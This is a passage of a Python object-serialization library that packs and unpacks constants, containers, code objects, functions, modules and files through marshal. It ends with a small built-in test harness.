return "%s %s"%( self.__class__, self.__name__ )
@classmethod
def getclass(cls):
return cls.partialinstance
@classmethod
def p_constructor(cls, object, **attributes):
return ()
@classmethod
def u_constructor(cls, data, **attributes):
return cls.new()
@classmethod
def p_instance(cls, object, **attributes):
return ()
### constants
if 'constants':
class __constant(__type__):
'''
        This parent class is used to assist in defining a constant. A constant
        typically has no attributes of its own and in most cases
        will only exist once in an interpreter. These are things like the
"object" type, or "float" type, etc.
'''
@classmethod
def new(cls, *args, **kwds):
'''
This method will create a new instance of the class returned by
the getclass() classmethod with the parameters provided as its
arguments.
'''
return cls.getclass()(*args, **kwds)
@classmethod
def p_instance(cls, object, **attributes):
'''
As the type is a constant, there are no attributes that are needed
to update the type. This method will simply return an empty tuple.
'''
return ()
@classmethod
def u_constructor(cls, data, **attributes):
'''
As the type is a constant, there are no parameters needed to
            construct it. This method will simply return the type returned by
the getclass() classmethod.
'''
return cls.getclass()
@package.cache.register_const
class type(__constant):
@classmethod
def getclass(cls):
return builtins.type
@package.cache.register_const
class object(__constant):
@classmethod
def getclass(cls):
return builtins.object
@package.cache.register_const
class module(__constant):
@classmethod
def getclass(cls):
return builtins.__class__
@classmethod
def instancelocal(cls, modulename, **kwds):
# XXX: this might be broken when re-constructing package modules
# where relative imports are used.
return __import__(modulename)
@classmethod
def instance(cls, modulename, doc=None):
try:
return cls.instancelocal(modulename, doc=doc)
except ImportError:
pass
return cls.new(modulename, doc)
@package.cache.register_const
class bool(__constant):
@classmethod
def getclass(cls):
return builtins.bool
@package.cache.register_const
class int(__constant):
@classmethod
def getclass(cls):
return (0).__class__
@package.cache.register_const
class float(__constant):
@classmethod
def getclass(cls):
return 0.0.__class__
if sys.version_info.major < 3:
@package.cache.register_const
class long(__constant):
@classmethod
def getclass(cls):
return eval('0L').__class__
@package.cache.register_const
class complex(__constant):
@classmethod
def getclass(cls):
return 0j.__class__
@package.cache.register_const
class str(__constant):
@classmethod
def getclass(cls):
return ''.__class__
if sys.version_info.major < 3:
@package.cache.register_const
class unicode(__constant):
@classmethod
def getclass(cls):
return u''.__class__
@package.cache.register_const
class buffer(__constant):
@classmethod
def getclass(cls):
return builtins.buffer('').__class__
else:
@package.cache.register_const
class bytes(__constant):
@classmethod
def getclass(cls):
return b''.__class__
@package.cache.register_const
class tuple(__constant):
@classmethod
def getclass(cls):
return ().__class__
@package.cache.register_const
class list(__constant):
@classmethod
def getclass(cls):
return [].__class__
@package.cache.register_const
class dict(__constant):
@classmethod
def getclass(cls):
return {}.__class__
@package.cache.register_const
class set(__constant):
@classmethod
def getclass(cls):
return {item for item in []}.__class__
@package.cache.register_const
class frozenset(__constant):
@classmethod
def getclass(cls):
return builtins.frozenset
@package.cache.register_const
class instancemethod(__constant):
@classmethod
def getclass(cls):
return cls.getclass.__class__
@package.cache.register_const
class property(__constant):
@classmethod
def getclass(cls):
return builtins.property
@package.cache.register_const
class code(__constant):
@classmethod
def getclass(cls):
res = lambda: None
return res.func_code.__class__ if sys.version_info.major < 3 else res.__code__.__class__
if sys.version_info.major < 3:
@classmethod
def new(cls, argcount, nlocals, stacksize, flags, codestring, constants, names, varnames, filename='<memory>', name='<unnamed>', firstlineno=0, lnotab='', freevars=(), cellvars=()):
i, s, t, b = (0).__class__, ''.__class__, ().__class__, b''.__class__
optional = lambda x: lambda y: (y, ())[y is None] # FIXME: it'd be less stupid to not ignore the provided type in 'x'
types = [ i, i, i, i, b, t, t, t, s, s, i, b, optional(t), optional(t) ]
values = [ argcount, nlocals, stacksize, flags, codestring, constants, names, varnames, filename, name, firstlineno, lnotab, freevars, cellvars ]
for idx, cons in enumerate(types):
values[idx] = cons(values[idx])
return cls.getclass()(*values)
else:
@classmethod
def new(cls, argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize, flags, codestring, constants, names, varnames, filename='<memory>', name='<unnamed>', firstlineno=0, lnotab='', freevars=(), cellvars=()):
i, s, t, b = (0).__class__, ''.__class__, ().__class__, b''.__class__
optional = lambda x: lambda y: (y, ())[y is None] # FIXME: it'd be less stupid to not ignore the provided type in 'x'
types = [ i, i, i, i, i, i, b, t, t, t, s, s, i, b, optional(t), optional(t) ]
values = [ argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize, flags, codestring, constants, names, varnames, filename, name, firstlineno, lnotab, freevars, cellvars ]
for idx, cons in enumerate(types):
values[idx] = cons(values[idx])
return cls.getclass()(*values)
@package.cache.register_const
class function(__constant):
@classmethod
def getclass(cls):
return (lambda:0).__class__
@classmethod
def new(cls, code, globs, **attributes):
'''Create a new function'''
name = attributes.get('name', code.co_name)
argdefs = attributes.get('argdefs', ())
closure = attributes.get('closure', ())
c = cls.getclass()
return c(code, globs, name, argdefs, closure)
@package.cache.register_const
class builtin(__constant):
@classmethod
def getclass(cls):
return builtins.setattr.__class__
@package.cache.register_const
class generator(__constant):
@classmethod
def getclass(cls):
return (x for x in [0]).__class__
@package.cache.register_const
class frame(__constant):
@classmethod
def getclass(cls):
return (x for x in [0]).gi_frame.__class__
@package.cache.register_const
class Staticmethod(__constant):
@classmethod
def getclass(cls):
return builtins.staticmethod
@package.cache.register_const
class Classmethod(__constant):
@classmethod
def getclass(cls):
return builtins.classmethod
## real constant
@package.cache.register_const
class none(__constant):
@classmethod
def getclass(cls):
return None
@package.cache.register_const
class true(__constant):
@classmethod
def getclass(cls):
return True
@package.cache.register_const
class false(__constant):
@classmethod
def getclass(cls):
return False
@package.cache.register_const
class notImplemented(__constant):
@classmethod
def getclass(cls):
return builtins.NotImplemented
@package.cache.register_const
class ellipsis(__constant):
@classmethod
def getclass(cls):
return builtins.Ellipsis
if sys.version_info.major < 3:
@package.cache.register_const
class file(__constant):
@classmethod
def getclass(cls):
return builtins.file
import _weakref
@package.cache.register_const
class weakref(__constant):
@classmethod
def getclass(cls):
return _weakref.ReferenceType
@package.cache.register_const
class super(__constant):
@classmethod
def getclass(cls):
return builtins.super
import _thread
@package.cache.register_const
class threadlock(__constant):
@classmethod
def getclass(cls):
return _thread.LockType
if 'core':
@package.cache.register_type
class type_(__type__):
'''any generic python type'''
# FIXME: when instantiating the hierarchy of types, this fails to associate
# the method with the proper parent class. this is apparent if you
# compare the help() of the original object to the deserialized object
@classmethod
def getclass(cls):
return type.getclass()
@classmethod
def subclasses(cls, type):
'''return all subclasses of type'''
if not builtins.isinstance(type, builtins.type):
raise AssertionError('%s is not a valid python type'% builtins.type(type))
if type.__bases__ == ():
return ()
result = type.__bases__
for x in type.__bases__:
result += cls.subclasses(x)
return result
@classmethod
def p_constructor(cls, object, **attributes):
name, bases, slots = (object.__name__, object.__bases__, ().__class__(getattr(object, '__slots__')) if hasattr(object, '__slots__') else None)
result = [slots, name]
result.extend(bases)
return ().__class__(result)
@classmethod
def u_constructor(cls, data, **attributes):
result = [].__class__(data)
slots, name = result.pop(0), result.pop(0)
if slots is None:
return builtins.type(name, ().__class__(result), {})
return builtins.type(name, ().__class__(result), {'__slots__': slots})
@classmethod
def p_instance(cls, object, **attributes):
state = {key : value for key, value in getattr(object, '__dict__', {}).items()}
if hasattr(object, '__slots__'):
state.update((k, getattr(object, k)) for k in object.__slots__ if hasattr(object, k))
            f = lambda: wat  # body never executes; we only need a function object
            t = builtins.type(f)
# non-serializeable descriptors
getset_descriptor = cls.__weakref__.__class__
method_descriptor = cls.__reduce_ex__.__class__
wrapper_descriptor = cls.__setattr__.__class__
member_descriptor = t.func_globals.__class__ if sys.version_info.major < 3 else t.__globals__.__class__
classmethod_descriptor = builtins.type(builtins.float.__dict__['fromhex'])
result = {}
for k, v in state.items():
if builtins.type(v) in {getset_descriptor, method_descriptor, wrapper_descriptor, member_descriptor, classmethod_descriptor, generator_.getclass()}:
continue
try:
_ = package.cache.byinstance(v)
except (KeyError, TypeError):
continue
result[k] = v
return result
@classmethod
def u_instance(cls, instance, data, **attributes):
for k, v in data.items():
try:
setattr(instance, k, v)
except (TypeError, AttributeError):
pass
return instance
if sys.version_info.major < 3:
@package.cache.register_type
class classobj(type_):
'''an old-style python class'''
@classmethod
def getclass(cls):
return builtins.type(package)
@package.cache.register_type
class Object(__constant):
@classmethod
def getclass(cls):
return builtins.object
@classmethod
def u_constructor(cls, data, **attributes):
return cls.new()
@package.cache.register
class object_(type_):
        '''a generic python object and all of its parent classes' properties'''
@classmethod
def p_constructor(cls, object, **attributes):
name, type = getattr(object, '__name__', None), object.__class__
# FIXME: we should check for serialization methods here
# like getnewargs, getstate, reduce, etc.
return (name, type)
@classmethod
def u_constructor(cls, data, **attributes):
name, type = data
type.__name__ = name or ''
object = cls.getclass()
wrapper_descriptor, builtin_function_or_method = (item.__class__ for item in [object.__init__, object.__new__])
# FIXME: create the instance illegitimately
if type.__new__.__class__ is not builtin_function_or_method:
raise Exception('Unable to support custom-defined .__new__ operators')
# TODO: bniemczyk would like a hint here for customizing __new__
old_init, new_init = type.__init__, lambda self: None,
type.__init__ = new_init
result = type()
type.__init__ = old_init
#result.__name__ = name
return result
@classmethod
def p_instance(cls, object, **attributes):
c = type_
result = [(c.id, c.p_instance(object, **attributes))]
for t in type_.subclasses(builtins.type(object)):
try:
c = package.cache.byclass(t)
except KeyError:
continue
result.append( (c.id, c.p_instance(object, **attributes)) )
return result
@classmethod
def u_instance(cls, instance, data, **attributes):
if len(data) == 0:
return instance
for id, data in data:
c = package.cache.byid(id)
instance = c.u_instance(instance, data, **attributes)
return instance
@package.cache.register
class module_local(__constant):
'''module that is locally stored in the filesystem'''
@classmethod
def getclass(cls):
return module.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
return object.__name__
@classmethod
def u_constructor(cls, data, **attributes):
name = data
return module.instancelocal(name)
@package.cache.register_type
class module_(module_local):
        '''a module and its attributes in memory'''
@classmethod
def p_constructor(cls, object, **attributes):
if sys.version_info.major < 3:
return '', object.__name__, object.__doc__
spec = object.__spec__
return spec.name if isinstance(spec.loader, __import__('_frozen_importlib').BuiltinImporter) else '', object.__name__, object.__doc__
@classmethod
def u_constructor(cls, data, **attributes):
spec, name, doc = data
if sys.version_info.major < 3 or not spec:
return cls.new(name, doc)
            res = __import__(spec)  # re-import the builtin module named by its spec
res.__name__, res.__doc__ = name, doc
return res
@classmethod
def p_instance(cls, object, **attributes):
if sys.version_info.major >= 3 and hasattr(object, '__spec__') and isinstance(object.__spec__.loader, __import__('_frozen_importlib').BuiltinImporter):
return {}
ignored = ('__builtins__', '__loader__')
return {k : v for k, v in object.__dict__.items() if k not in ignored}
@classmethod
def u_instance(cls, instance, data, **attributes):
for attribute, value in data.items():
setattr(instance, attribute, value)
return instance
if sys.version_info.major >= 3:
@package.cache.register_const
class ModuleSpec(__constant):
@classmethod
def getclass(cls):
return __import__('_frozen_importlib').ModuleSpec
@package.cache.register_type
class ModuleSpec_(__type__):
@classmethod
def getclass(cls):
return __import__('_frozen_importlib').ModuleSpec
@classmethod
def p_constructor(cls, object, **attributes):
#return object.name, object.loader, object.origin, object.loader_state, hasattr(object, '__path__')
return object.name, None, object.origin, object.loader_state, hasattr(object, '__path__')
@classmethod
def u_constructor(cls, data, **attributes):
cons = cls.getclass()
name, loader, origin, loader_state, is_package = data
#return cons(name, loader, parent=parent, origin=origin, loader_state=loader_state, is_package=is_package)
return cons(name, None, origin=origin, loader_state=loader_state, is_package=is_package)
@classmethod
def p_instance(cls, object, **attributes):
return object.submodule_search_locations
@classmethod
def u_instance(cls, instance, data, **attributes):
instance.submodule_search_locations = data
return instance
if 'builtin':
class __builtin(__type__):
@classmethod
def p_constructor(cls, object, **attributes):
return object
@classmethod
def u_constructor(cls, data, **attributes):
return cls.new(data)
@classmethod
def p_instance(cls, object, **attributes):
return ()
@classmethod
def new(cls, *args, **kwds):
return cls.getclass()(*args, **kwds)
@package.cache.register_type
class bool_(__builtin):
'''standard boolean type'''
@classmethod
def getclass(cls):
return bool.getclass()
@package.cache.register_type
class int_(__builtin):
'''integral value'''
@classmethod
def getclass(cls):
return int.getclass()
@package.cache.register_type
class float_(__builtin):
'''float value'''
@classmethod
def getclass(cls):
return float.getclass()
if sys.version_info.major < 3:
@package.cache.register_type
class long_(__builtin):
'''long value'''
@classmethod
def getclass(cls):
return long.getclass()
@package.cache.register_type
class complex_(__builtin):
'''complex value'''
@classmethod
def getclass(cls):
return complex.getclass()
## sequence types
@package.cache.register_type
class str_(__builtin):
'''str value'''
@classmethod
def getclass(cls):
return str.getclass()
if sys.version_info.major < 3:
@package.cache.register_type
class unicode_(__builtin):
'''unicode string'''
@classmethod
def getclass(cls):
return unicode.getclass()
@package.cache.register_type
class buffer_(__builtin):
'''string buffer'''
@classmethod
def getclass(cls):
return buffer.getclass()
else:
@package.cache.register_type
class bytes_(__builtin):
            '''byte string'''
@classmethod
def getclass(cls):
return bytes.getclass()
if 'immutable':
@package.cache.register_type
class tuple_(__type__):
'''an immutable tuple'''
@classmethod
def getclass(cls):
return tuple.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
return object
@classmethod
def u_constructor(cls, data, **attributes):
return ().__class__(data)
@classmethod
def p_instance(cls, object, **attributes):
'''return attributes of type that will be used to update'''
return ()
@classmethod
def u_instance(cls, instance, data, **attributes):
return instance
if 'mutable':
class __mutable(__type__):
@classmethod
def p_constructor(cls, object, **attributes):
return ()
@classmethod
def u_constructor(cls, data, **attributes):
return cls.new(data)
@classmethod
def new(cls, *args, **kwds):
return cls.getclass()(*args, **kwds)
@package.cache.register_type
class list_(__mutable):
'''a list'''
@classmethod
def getclass(cls):
return list.getclass()
@classmethod
def p_instance(cls, object, **attributes):
'''return attributes of type that will be used to update'''
return ().__class__(object)
@classmethod
def u_instance(cls, instance, data, **attributes):
'''update the object with the provided data'''
instance[:] = data
return instance
@package.cache.register_type
class dict_(__mutable):
'''a dictionary'''
@classmethod
def getclass(cls):
return dict.getclass()
@classmethod
def p_instance(cls, object, **attributes):
'''return attributes of type that will be used to update'''
return object
@classmethod
def u_instance(cls, instance, data, **attributes):
'''update the object with the provided data'''
instance.clear()
instance.update(data)
return instance
@package.cache.register_type
class set_(__mutable):
'''a set'''
@classmethod
def getclass(cls):
return set.getclass()
@classmethod
def p_instance(cls, object, **attributes):
'''return attributes of type that will be used to update'''
return ().__class__(object)
@classmethod
def u_instance(cls, instance, data, **attributes):
instance.clear()
instance.update(data)
return instance
@package.cache.register_type
class frozenset_(__mutable):
'''a frozenset'''
@classmethod
def getclass(cls):
return frozenset.getclass()
@classmethod
def p_instance(cls, object, **attributes):
'''return attributes of type that will be used to update'''
return ().__class__(object)
if 'special':
class __special(__type__):
attributes = None
@classmethod
def getclass(cls):
raise NotImplementedError(cls)
@classmethod
def p_constructor(cls, object, **attributes):
result = {}
if cls.attributes.__class__ == {}.__class__:
result.update((k, getattr(object, k, cls.attributes[k])) for k in cls.attributes)
else:
result.update((k, getattr(object, k)) for k in cls.attributes)
return result
@classmethod
def p_instance(cls, object, **attributes):
return ()
@package.cache.register_type
class instancemethod_(__special):
'''a python class method'''
attributes = ['im_func', 'im_self', 'im_class']
@classmethod
def getclass(cls):
return instancemethod.getclass()
@classmethod
def u_constructor(cls, data, **attributes):
return cls.new(data['im_func'], data['im_self'], data['im_class'])
@package.cache.register_type
class property_(__special):
'''a python class property'''
attributes = ['fdel', 'fset', 'fget']
@classmethod
def getclass(cls):
return property.getclass()
@classmethod
def u_constructor(cls, data, **attributes):
return property.new(fget=data['fget'], fset=data['fset'], fdel=data['fdel'])
@package.cache.register_type
class code_(__special):
'''a python code type'''
if sys.version_info.major < 3:
attributes = [
'co_argcount', 'co_nlocals', 'co_stacksize', 'co_flags', 'co_code',
'co_consts', 'co_names', 'co_varnames', 'co_filename', 'co_name',
'co_firstlineno', 'co_lnotab', 'co_freevars', 'co_cellvars'
]
else:
attributes = [
'co_argcount', 'co_posonlyargcount', 'co_kwonlyargcount', 'co_nlocals', 'co_stacksize',
'co_flags', 'co_code', 'co_consts', 'co_names', 'co_varnames',
'co_filename', 'co_name', 'co_firstlineno', 'co_lnotab',
'co_freevars', 'co_cellvars'
]
@classmethod
def getclass(cls):
return code.getclass()
@classmethod
def u_constructor(cls, data, **attributes):
result = (data[k] for k in cls.attributes)
return code.new(*result)
@package.cache.register_type
class function_(__type__):
'''a python function'''
@classmethod
def getclass(cls):
return function.getclass()
# FIXME: having to include the globals for an unbound function (__module__ is undefined) might be weird
@classmethod
def p_constructor(cls, object, **attributes):
# so...it turns out that only the closure property is immutable
res = object.func_closure if sys.version_info.major < 3 else object.__closure__
func_closure = () if res is None else res
func_code = object.func_code if sys.version_info.major < 3 else object.__code__
if object.__module__ is None:
raise AssertionError('FIXME: Unable to pack an unbound function')
return object.__module__, func_code, ().__class__(cell.cell_contents for cell in func_closure)
@classmethod
def u_constructor(cls, data, **attributes):
# modulename, code, closure, globals = data
modulename, code, closure = data
            if modulename is None:
raise AssertionError('FIXME: Unable to unpack an unbound function')
# XXX: assign the globals from hints if requested
globs = attributes['globals'] if 'globals' in attributes else module.instance(modulename).__dict__
result = cls.cell(*closure)
return function.new(code, globs, closure=result)
@classmethod
def p_instance(cls, object, **attributes):
if sys.version_info.major < 3:
return object.func_code, object.func_name, object.func_defaults
return object.__code__, object.__name__, object.__defaults__
@classmethod
def u_instance(cls, instance, data, **attributes):
instance.func_code, instance.func_name, instance.func_defaults = data
return instance
@classmethod
def cell(cls, *args):
'''Convert args into a cell tuple'''
if sys.version_info.major < 3:
return ().__class__(((lambda item: lambda : item)(item).func_closure[0]) for item in args)
return ().__class__(((lambda item: lambda : item)(item).__closure__[0]) for item in args)
@package.cache.register
class builtin_(__constant):
'''copy from local module and name'''
@classmethod
def getclass(cls):
return builtin.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
return (object.__module__, object.__name__)
@classmethod
def u_constructor(cls, data, **attributes):
mod, name = data
m = module.instancelocal(mod)
return getattr(m, name)
if sys.version_info.major < 3:
@package.cache.register
class file_(__constant):
            '''A file. For serializing the contents of the file, look at file_contents'''
@classmethod
def getclass(cls):
return file.getclass()
@classmethod
def p_constructor(cls, file, **attributes):
offset = file.tell()
return file.name, file.mode, offset
@classmethod
def u_constructor(cls, data, **attributes):
name, mode, offset = data
file = open(name, mode)
file.seek(offset)
return file
@package.cache.register
class file_contents(file_):
# FIXME: save the whole file.. (should be selected via a hint)
@classmethod
def getclass(cls):
return file.getclass()
@classmethod
def p_constructor(cls, file, **attributes):
offset = file.tell()
file.seek(0)
content = file.read()
file.seek(offset)
return (file.name, file.mode, offset, content)
@classmethod
def u_constructor(cls, data, **attributes):
name, mode, offset, content = data
file = open(name, "w")
file.write(content)
file.close()
file = open(name, mode)
file.seek(offset)
return file
import _weakref
@package.cache.register_type
class weakref_(__type__):
@classmethod
def getclass(cls):
return _weakref.ReferenceType
@classmethod
def p_constructor(cls, object, **attributes):
return (object(),)
@classmethod
def u_constructor(cls, data, **attributes):
object, = data
class extref(_weakref.ref):
def __new__(self, object):
self.__cycle__ = object
return _weakref.ref(object)
# return super(extref, self)(object)
return extref(object)
@classmethod
def p_instance(cls, object, **attributes):
return ()
@package.cache.register_type
class super_(__type__):
@classmethod
def getclass(cls):
return builtins.super
@classmethod
def p_constructor(cls, object, **attributes):
return (object.__thisclass__, object.__self__)
@classmethod
def u_constructor(cls, data, **attributes):
thisclass, self = data
return builtins.super(thisclass, self)
@classmethod
def p_instance(cls, object, **attributes):
return ()
import _thread
@package.cache.register_type
class threadlock_(__type__):
@classmethod
def getclass(cls):
return _thread.LockType # XXX
@classmethod
def p_constructor(cls, object, **attributes):
return ()
@classmethod
def u_constructor(cls, data, **attributes):
return _thread.allocate_lock()
@classmethod
def p_instance(cls, object, **attributes):
return ()
# XXX: the following aren't completed...maybe never will be
@package.cache.register_type
class generator_(__type__):
@classmethod
def getclass(cls):
return generator.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
raise NotImplementedError('Unable to pack objects of type generator_') # Due to the gi_frame property
return object.gi_running, object.gi_code, object.gi_frame
@classmethod
def u_constructor(cls, data, **attributes):
co, fr = data
result = function.new(co, fr.f_globals)
raise NotImplementedError('Unable to unpack objects of type generator_')
return result
@classmethod
def p_instance(cls, object, **attributes):
return ()
@classmethod
def u_instance(cls, instance, data, **attributes):
return instance
@package.cache.register_type
class frame_(incomplete): # FIXME: can't construct these, we can create a shell object for these tho maybe
attributes = ['f_back', 'f_builtins', 'f_code', 'f_exc_traceback', 'f_exc_type', 'f_exc_value', 'f_globals', 'f_lasti', 'f_lineno', 'f_locals', 'f_restricted', 'f_trace']
@classmethod
def getclass(cls):
return frame.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
raise NotImplementedError('Unable to pack objects of type frame_')
@classmethod
def u_constructor(cls, data, **attributes):
raise NotImplementedError('Unable to unpack objects of type frame_')
@package.cache.register_type
class staticmethod_(__constant):
@classmethod
def getclass(cls):
return Staticmethod.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
return object.__func__,
@classmethod
def u_constructor(cls, data, **attributes):
fn, = data
return cls.new(fn)
@package.cache.register_type
class classmethod_(__constant):
@classmethod
def getclass(cls):
return Classmethod.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
return object.__func__,
@classmethod
def u_constructor(cls, data, **attributes):
fn, = data
return cls.new(fn)
import re, _sre
@package.cache.register_type
class re_pattern(__constant):
@classmethod
def getclass(cls):
res = _sre.compile('', 0, [1], 0, {}, ())
return res.__class__
@classmethod
def p_constructor(cls, object, **attributes):
return object.pattern, object.flags
@classmethod
def u_constructor(cls, data, **attributes):
pattern, flags = data
return re._compile(pattern, flags)
if 'operator':
import functools, operator
class __operator_reduceable(__constant):
@classmethod
def p_constructor(cls, object, **attributes):
return object.__reduce__()
@classmethod
def u_constructor(cls, data, **attributes):
t, parameters = data
return t(*parameters)
@package.cache.register_const
class partial(__constant):
@classmethod
def getclass(cls):
return functools.partial
@package.cache.register_type
class partial_(__operator_reduceable):
@classmethod
def getclass(cls):
return functools.partial
@classmethod
def p_constructor(cls, object, **attributes):
t = object.__class__
return t, (object.func, object.args, object.keywords)
@classmethod
def u_constructor(cls, data, **attributes):
t, (f, args, kwargs) = data
return t(f, *args, **kwargs)
@package.cache.register_const
class attrgetter(__constant):
@classmethod
def getclass(cls):
return operator.attrgetter
@package.cache.register_type
class attrgetter_(__operator_reduceable):
@classmethod
def getclass(cls):
return operator.attrgetter
# Python2 methodology for determining which attributes
# of a class are being touched by an operator.
@classmethod
def attribute_collector(cls, append):
def closure(self, name, append=append):
items = [name]
append(items)
return cls.attribute_collector(items.append)
class dummy(object): pass
dummy.__getattribute__ = closure
return dummy()
@classmethod
def attribute_flatten(cls, items):
def collect(item):
if len(item) > 1:
head, tail = item[0], collect(item[1])
return [head] + tail
return item
return [collect(item) for item in items]
# Python2 methodology of figuring out the attributes
def __p_constructor_v2(cls, object, **attributes):
t, state = cls.getclass(), []
dummy = cls.attribute_collector(state.append)
object(dummy)
attribs = cls.attribute_flatten(state)
return t, ().__class__('.'.join(item) for item in attribs)
def __p_constructor_v3(cls, object, **attributes):
return object.__reduce__()
p_constructor = classmethod(__p_constructor_v2 if sys.version_info.major < 3 else __p_constructor_v3)
@package.cache.register_const
class itemgetter(__constant):
@classmethod
def getclass(cls):
return operator.itemgetter
@package.cache.register_type
class itemgetter_(__operator_reduceable):
@classmethod
def getclass(cls):
return operator.itemgetter
# Python2 methodology for determining which items
# of an object are being fetched by an operator.
@classmethod
def item_collector(cls, append):
def closure(self, item, append=append):
append(item)
return None
class dummy(object): pass
dummy.__getitem__ = closure
return dummy()
# Python2 methodology of figuring out the items
def __p_constructor_v2(cls, object, **attributes):
t, state = cls.getclass(), []
dummy = cls.item_collector(state.append)
object(dummy)
return t, ().__class__(item for item in state)
def __p_constructor_v3(cls, object, **attributes):
return object.__reduce__()
p_constructor = classmethod(__p_constructor_v2 if sys.version_info.major < 3 else __p_constructor_v3)
@package.cache.register_const
class methodcaller(__constant):
@classmethod
def getclass(cls):
return operator.methodcaller
@package.cache.register_type
class methodcaller_(__operator_reduceable):
@classmethod
def getclass(cls):
return operator.methodcaller
# Python2 methodology for determining which attributes
# of a class will be called by an operator
@classmethod
def method_collector(cls, append):
def preserve(state):
def call(*args, **kwargs):
state.append((args, kwargs))
return call
def closure(self, name, callable=preserve, append=append):
item = [name]
append(item)
return callable(item)
class dummy(object): pass
dummy.__getattribute__ = closure
return dummy()
# Python2 methodology of figuring out the attributes
def __p_constructor_v2(cls, object, **attributes):
t, state = cls.getclass(), []
dummy = cls.method_collector(state.append)
object(dummy)
f, (args, keywords) = state[0]
fargs = (f,) + args
return t, (fargs, keywords)
def __p_constructor_v3(cls, object, **attributes):
partial, args = object.__reduce__()
if partial is cls.getclass():
return partial, (args, {})
return partial.func, (partial.args + args, partial.keywords)
p_constructor = classmethod(__p_constructor_v2 if sys.version_info.major < 3 else __p_constructor_v3)
@classmethod
def u_constructor(cls, data, **attributes):
t, (args, keywords) = data
return t(*args, **keywords)
## regular functions
#import cPickle as pickle
import marshal as pickle
def dumps(object, **attributes):
'''Convert any python object into a string.'''
return pickle.dumps(package.pack(object, **attributes))
def loads(data, **attributes):
'''Convert a string back into a python object.'''
return package.unpack(pickle.loads(data), **attributes)
def pack(object, **attributes):
'''Serialize an instance of a python object into a tuple'''
return package.pack(object, **attributes)
def unpack(data, **attributes):
'''Deserialize a tuple back into an instance'''
return package.unpack(data, **attributes)
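# Minimal round-trip sketch (illustrative):
#   >>> data = dumps({'key': (1, 2.0, 'three')})
#   >>> loads(data)
#   {'key': (1, 2.0, 'three')}
# pack()/unpack() expose the same conversion as plain tuples, without the
# marshal byte layer.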
def caller(frame=None):
"""Return the (module, name) of the requested frame.
This will default to the calling function if a frame is not supplied.
"""
fr = sys._getframe().f_back if frame is None else frame
source, name = fr.f_code.co_filename, fr.f_code.co_name
module = [x for x in sys.modules.values() if hasattr(x, '__file__') and (x.__file__.endswith(source) or x.__file__.endswith('%sc'%source))]
module, = (None,) if not module else module
return module, name
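# Illustrative usage: calling caller() inside a function defined in a module
# returns roughly (<module 'mymodule'>, 'myfunction'); the module may be None
# if no loaded module matches the frame's source file.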
if __name__ == '__main__':
import traceback
class Result(Exception): pass
class Success(Result): pass
class Failure(Result): pass
Werror = True
TestCaseList = []
def TestCase(fn):
def harness(**kwds):
name = fn.__name__
try:
res = fn(**kwds)
raise Failure
except Success as E:
print('%s: %r'% (name, E))
return True
except Failure as E:
print('%s: %r'% (name, E))
except Exception as E:
print('%s: %r : %r'% (name, Failure(), E))
#print(traceback.format_exc())
return False
TestCaseList.append(harness)
return fn
if __name__ == '__main__':
from builtins import *
import builtins, fu
# lame helpers for testcases
def make_package(cls, cons, inst):
m, n = '__main__', 'unnamed'
result = (fu.VERSION, 0, ({0:(cls.id, cons)}, {0:(cls.id, inst)}))
# result = (fu.VERSION, 0, ({0:(cls.id, (m, n), cons)}, {0:(cls.id, inst)}))
return result
def extract_package(package):
_, id, (cons, inst) = package
return id, cons, inst
def check_package(package):
ver, id, (cons, inst) = package
if {item for item in cons.keys()} != {item for item in inst.keys()}:
return False
if ver != fu.VERSION:
return False
return id in cons
class A(object):
pass
class B(A):
def method(self):
return 'B'
class C1(B):
def method_c1(self):
return 'C1'
class C2(B):
def method_c2(self):
return 'C2'
class D(C1, C2):
def method_c1(self):
return 'D'
if __name__ == '__main__':
@TestCase
def test_pack_type():
input = True
result = fu.package.pack(input)
if check_package(result):
raise Success
@TestCase
def test_builtin_pack():
input = 0x40
result = fu.package.pack(input)
id, cons, inst = extract_package(result)
if cons[id][-1] == input:
raise Success
@TestCase
def test_builtin_unpack():
input = make_package(fu.bool_, True, ())
result = fu.package.unpack(input)
if result == True:
raise Success
@TestCase
def test_constant_unpack():
input = make_package(fu.none, (), ())
result = fu.package.unpack(input)
if result == None:
raise Success
@TestCase
def test_list_pack():
l = [item for item in range(5)]
result = fu.package.pack(l)
id, cons, inst = extract_package(result)
if check_package(result) and len(cons) == len(l) + 1:
raise Success
@TestCase
def test_listref_pack():
a = [item for item in range(5)]
l = 4 * [a]
result = fu.package.pack(l)
id, cons, inst = extract_package(result)
_, items = inst[id]
if check_package(result) and len(cons) == len(inst) == len(a) + 1 + 1 and len({item for item in items}) == 1:
raise Success
@TestCase
def test_listrecurse_pack():
a = []
a.append(a)
result = fu.package.pack(a)
id, cons, inst = extract_package(result)
if inst[id][1][0] == id:
raise Success
@TestCase
def test_dict_pack():
l = {'hello': 'world', 5: 10, True: False}
result = fu.package.pack(l)
id, cons, inst = extract_package(result)
if check_package(result) and len(inst) == len(cons) == 2 * len(l) + 1:
raise Success
@TestCase
def test_dictref_pack():
a = [item for item in range(5)]
l = {'hello': a, 'world': a}
result = fu.package.pack(l)
id, cons, inst = extract_package(result)
if check_package(result) and len(cons) == len(inst) == len(a) + 1 + len(l) + 1:
raise Success
@TestCase
def test_dictrecurse_pack():
a = {}
a[5] = a
result = fu.package.pack(a)
id, cons, inst = extract_package(result)
if check_package(result) and [item for item in inst[id][1].values()][0] == id:
raise Success
@TestCase
def test_listref_unpack():
a = [5]
a.append(a)
data = fu.package.pack(a)
y = fu.package.unpack(data)
if y[1][1][0] == 5:
raise Success
@TestCase
def test_dictref_unpack():
a = {}
a[5] = None
a[6] = a
data = fu.package.pack(a)
y = fu.package.unpack(data)
if y[6][5] is None:
raise Success
def test_code_packunpack_v2():
def func(*args):
return ' '.join(args)
a = fu.package.pack(func.func_code)
b = fu.package.unpack(a)
if func.func_code.co_name == b.co_name and func.func_code is not b:
raise Success
def test_code_packunpack_v3():
def func(*args):
return ' '.join(args)
a = fu.package.pack(func.__code__)
b = fu.package.unpack(a)
if func.__code__.co_name == b.co_name and func.__code__ is not b:
raise Success
test_code_packunpack = TestCase(test_code_packunpack_v2 if sys.version_info.major < 3 else test_code_packunpack_v3)
